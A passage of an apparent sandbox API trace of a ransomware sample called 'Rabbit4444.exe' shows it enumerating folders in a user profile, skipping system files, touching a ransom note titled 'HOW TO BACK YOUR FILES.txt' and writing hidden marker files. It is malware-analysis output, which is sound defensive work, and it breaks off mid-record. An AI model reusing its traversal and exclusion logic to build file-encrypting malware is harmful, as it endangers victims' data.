[0066.532] lstrcmpiW (lpString1="AppData", lpString2="Rabbit4444.exe") returned -1 [0066.532] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0066.532] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0066.532] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0066.532] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0066.532] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0066.532] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0066.532] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0066.532] lstrcmpiW (lpString1="AppData", lpString2="NTUSER.DAT") returned -1 [0066.532] lstrcpyW (in: lpString1=0x130ebf8, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0066.532] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122160 [0066.532] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd0) returned 0x108688 [0066.532] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122168 | out: ListHead=0xf68b0, ListEntry=0x122168) returned 0x122108 [0066.532] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74b12964, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b12964, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x74b12964, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0066.532] lstrcmpiW (lpString1="LocalCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.532] lstrcmpiW (lpString1="LocalCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.532] lstrcmpiW (lpString1="LocalCache", lpString2="Rabbit4444.exe") returned -1 [0066.532] lstrcmpiW (lpString1="LocalCache", lpString2=".") returned 1 [0066.532] lstrcmpiW (lpString1="LocalCache", lpString2="..") returned 1 [0066.532] lstrcmpiW (lpString1="LocalCache", lpString2="windows") returned -1 [0066.532] lstrcmpiW (lpString1="LocalCache", lpString2="bootmgr") returned 1 [0066.533] lstrcmpiW (lpString1="LocalCache", lpString2="pagefile.sys") returned -1 [0066.533] lstrcmpiW (lpString1="LocalCache", lpString2="boot") returned 1 [0066.533] lstrcmpiW (lpString1="LocalCache", lpString2="ids.txt") returned 1 [0066.533] lstrcmpiW (lpString1="LocalCache", lpString2="NTUSER.DAT") returned -1 [0066.533] lstrcpyW (in: lpString1=0x130ebf8, lpString2="LocalCache" | out: lpString1="LocalCache") returned="LocalCache" [0066.533] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fe0 [0066.533] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd6) returned 0x11c068 [0066.533] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fe8 | out: ListHead=0xf68b0, ListEntry=0x121fe8) returned 0x122168 [0066.533] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74b12964, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b12964, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x74b12964, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0066.533] lstrcmpiW (lpString1="LocalState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.533] lstrcmpiW (lpString1="LocalState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.533] lstrcmpiW (lpString1="LocalState", lpString2="Rabbit4444.exe") returned -1 [0066.533] lstrcmpiW (lpString1="LocalState", lpString2=".") returned 1 [0066.533] lstrcmpiW (lpString1="LocalState", lpString2="..") returned 1 [0066.533] lstrcmpiW (lpString1="LocalState", lpString2="windows") returned -1 [0066.533] lstrcmpiW (lpString1="LocalState", lpString2="bootmgr") returned 1 [0066.533] lstrcmpiW (lpString1="LocalState", lpString2="pagefile.sys") returned -1 [0066.533] lstrcmpiW (lpString1="LocalState", lpString2="boot") returned 1 [0066.533] lstrcmpiW (lpString1="LocalState", lpString2="ids.txt") returned 1 [0066.533] lstrcmpiW (lpString1="LocalState", lpString2="NTUSER.DAT") returned -1 [0066.533] lstrcpyW (in: lpString1=0x130ebf8, lpString2="LocalState" | out: lpString1="LocalState") returned="LocalState" [0066.533] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122340 [0066.533] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd6) returned 0x11b888 [0066.533] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122348 | out: ListHead=0xf68b0, ListEntry=0x122348) returned 0x121fe8 [0066.533] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74b12964, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b12964, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x74b12964, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0066.533] lstrcmpiW (lpString1="RoamingState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.533] lstrcmpiW (lpString1="RoamingState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.533] lstrcmpiW (lpString1="RoamingState", lpString2="Rabbit4444.exe") returned 1 [0066.533] lstrcmpiW (lpString1="RoamingState", lpString2=".") returned 1 [0066.533] lstrcmpiW (lpString1="RoamingState", lpString2="..") returned 1 [0066.533] lstrcmpiW (lpString1="RoamingState", lpString2="windows") returned -1 [0066.533] lstrcmpiW (lpString1="RoamingState", lpString2="bootmgr") returned 1 [0066.533] lstrcmpiW (lpString1="RoamingState", lpString2="pagefile.sys") returned 1 [0066.533] lstrcmpiW (lpString1="RoamingState", lpString2="boot") returned 1 [0066.534] lstrcmpiW (lpString1="RoamingState", lpString2="ids.txt") returned 1 [0066.534] lstrcmpiW (lpString1="RoamingState", lpString2="NTUSER.DAT") returned 1 [0066.534] lstrcpyW (in: lpString1=0x130ebf8, lpString2="RoamingState" | out: lpString1="RoamingState") returned="RoamingState" [0066.534] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122240 [0066.534] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xda) returned 0x125910 [0066.534] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122248 | out: ListHead=0xf68b0, ListEntry=0x122248) returned 0x122348 [0066.534] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74b12964, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b12964, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x74b12964, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Settings", cAlternateFileName="")) returned 1 [0066.534] lstrcmpiW (lpString1="Settings", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.534] lstrcmpiW (lpString1="Settings", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.534] lstrcmpiW (lpString1="Settings", lpString2="Rabbit4444.exe") returned 1 [0066.534] lstrcmpiW (lpString1="Settings", lpString2=".") returned 1 [0066.534] lstrcmpiW (lpString1="Settings", lpString2="..") returned 1 [0066.534] lstrcmpiW (lpString1="Settings", lpString2="windows") returned -1 [0066.534] lstrcmpiW (lpString1="Settings", lpString2="bootmgr") returned 1 [0066.534] lstrcmpiW (lpString1="Settings", lpString2="pagefile.sys") returned 1 [0066.534] lstrcmpiW (lpString1="Settings", lpString2="boot") returned 1 [0066.534] lstrcmpiW (lpString1="Settings", lpString2="ids.txt") returned 1 [0066.534] lstrcmpiW (lpString1="Settings", lpString2="NTUSER.DAT") returned 1 [0066.534] lstrcpyW (in: lpString1=0x130ebf8, lpString2="Settings" | out: lpString1="Settings") returned="Settings" [0066.534] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122220 [0066.534] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd2) returned 0x11b6c8 [0066.534] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122228 | out: ListHead=0xf68b0, ListEntry=0x122228) returned 0x122248 [0066.534] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74b12964, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b12964, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x74b12964, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0066.534] lstrcmpiW (lpString1="SystemAppData", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.534] lstrcmpiW (lpString1="SystemAppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.534] lstrcmpiW (lpString1="SystemAppData", lpString2="Rabbit4444.exe") returned 1 [0066.534] lstrcmpiW (lpString1="SystemAppData", lpString2=".") returned 1 [0066.534] lstrcmpiW (lpString1="SystemAppData", lpString2="..") returned 1 [0066.534] lstrcmpiW (lpString1="SystemAppData", lpString2="windows") returned -1 [0066.534] lstrcmpiW (lpString1="SystemAppData", lpString2="bootmgr") returned 1 [0066.534] lstrcmpiW (lpString1="SystemAppData", lpString2="pagefile.sys") returned 1 [0066.534] lstrcmpiW (lpString1="SystemAppData", lpString2="boot") returned 1 [0066.534] lstrcmpiW (lpString1="SystemAppData", lpString2="ids.txt") returned 1 [0066.534] lstrcmpiW (lpString1="SystemAppData", lpString2="NTUSER.DAT") returned 1 [0066.535] lstrcpyW (in: lpString1=0x130ebf8, lpString2="SystemAppData" | out: lpString1="SystemAppData") returned="SystemAppData" [0066.535] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122300 [0066.535] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xdc) returned 0x1259f8 [0066.535] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122308 | out: ListHead=0xf68b0, ListEntry=0x122308) returned 0x122228 [0066.535] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74b12964, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b12964, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x74b12964, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0066.535] lstrcmpiW (lpString1="TempState", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0066.535] lstrcmpiW (lpString1="TempState", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0066.535] lstrcmpiW (lpString1="TempState", lpString2="Rabbit4444.exe") returned 1 [0066.535] lstrcmpiW (lpString1="TempState", lpString2=".") returned 1 [0066.535] lstrcmpiW (lpString1="TempState", lpString2="..") returned 1 [0066.535] lstrcmpiW (lpString1="TempState", lpString2="windows") returned -1 [0066.535] lstrcmpiW (lpString1="TempState", lpString2="bootmgr") returned 1 [0066.535] lstrcmpiW (lpString1="TempState", lpString2="pagefile.sys") returned 1 [0066.535] lstrcmpiW (lpString1="TempState", lpString2="boot") returned 1 [0066.535] lstrcmpiW (lpString1="TempState", lpString2="ids.txt") returned 1 [0066.535] lstrcmpiW (lpString1="TempState", lpString2="NTUSER.DAT") returned 1 [0066.535] lstrcpyW (in: lpString1=0x130ebf8, lpString2="TempState" | out: lpString1="TempState") returned="TempState" [0066.535] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122320 [0066.535] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd4) returned 0x11b508 [0066.535] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122328 | out: ListHead=0xf68b0, ListEntry=0x122328) returned 0x122308 [0066.535] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74b12964, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b12964, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x74b12964, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0066.535] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0066.535] lstrcpyW (in: lpString1=0x130ebf8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.535] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkcaptiveportal_cw5n1h2txyewy\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.536] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.536] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.536] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.537] CloseHandle (hObject=0x27c) returned 1 [0066.537] CloseHandle (hObject=0x228) returned 1 [0066.537] GetCurrentThreadId () returned 0xd98 [0066.537] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122328 [0066.537] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\TempState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\TempState" [0066.537] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11b508 | out: hHeap=0xe0000) returned 1 [0066.537] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122320 | out: hHeap=0xe0000) returned 1 [0066.537] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\TempState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\TempState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\TempState" [0066.537] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\TempState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\TempState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\TempState\\" [0066.537] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\TempState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3" [0066.537] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkcaptiveportal_cw5n1h2txyewy\\tempstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.539] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.542] FlushFileBuffers (hFile=0x228) returned 1 [0066.542] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\TempState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.543] CloseHandle (hObject=0x228) returned 1 [0066.543] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\TempState") returned 105 [0066.543] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.543] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\TempState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74b12964, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b12964, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0fae9d3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a50 [0066.543] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.543] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.543] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.543] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.543] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74b12964, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b12964, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0fae9d3, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.543] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.543] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.544] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.544] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.544] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.544] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0fae9d3, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0fae9d3, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0fd4afa, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.544] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.544] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.544] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf0fae9d3, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf0fae9d3, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf0fd4afa, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.544] FindClose (in: hFindFile=0x102a50 | out: hFindFile=0x102a50) returned 1 [0066.544] lstrcpyW (in: lpString1=0x130ec0c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.544] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\TempState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkcaptiveportal_cw5n1h2txyewy\\tempstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.545] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.545] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.545] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.546] CloseHandle (hObject=0x27c) returned 1 [0066.546] CloseHandle (hObject=0x228) returned 1 [0066.546] GetCurrentThreadId () returned 0xd98 [0066.546] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122308 [0066.546] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\SystemAppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\SystemAppData" [0066.546] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1259f8 | out: hHeap=0xe0000) returned 1 [0066.546] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122300 | out: hHeap=0xe0000) returned 1 [0066.546] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\SystemAppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\SystemAppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\SystemAppData" [0066.546] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\SystemAppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\SystemAppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\SystemAppData\\" [0066.546] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\SystemAppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3" [0066.546] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.oobenetworkcaptiveportal_cw5n1h2txyewy\\systemappdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.547] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.552] FlushFileBuffers (hFile=0x228) returned 1 [0066.553] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\SystemAppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.553] CloseHandle (hObject=0x228) returned 1 [0066.553] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\SystemAppData") returned 109 [0066.553] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.553] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\\SystemAppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74b12964, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x74b12964, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf0fd4afa, 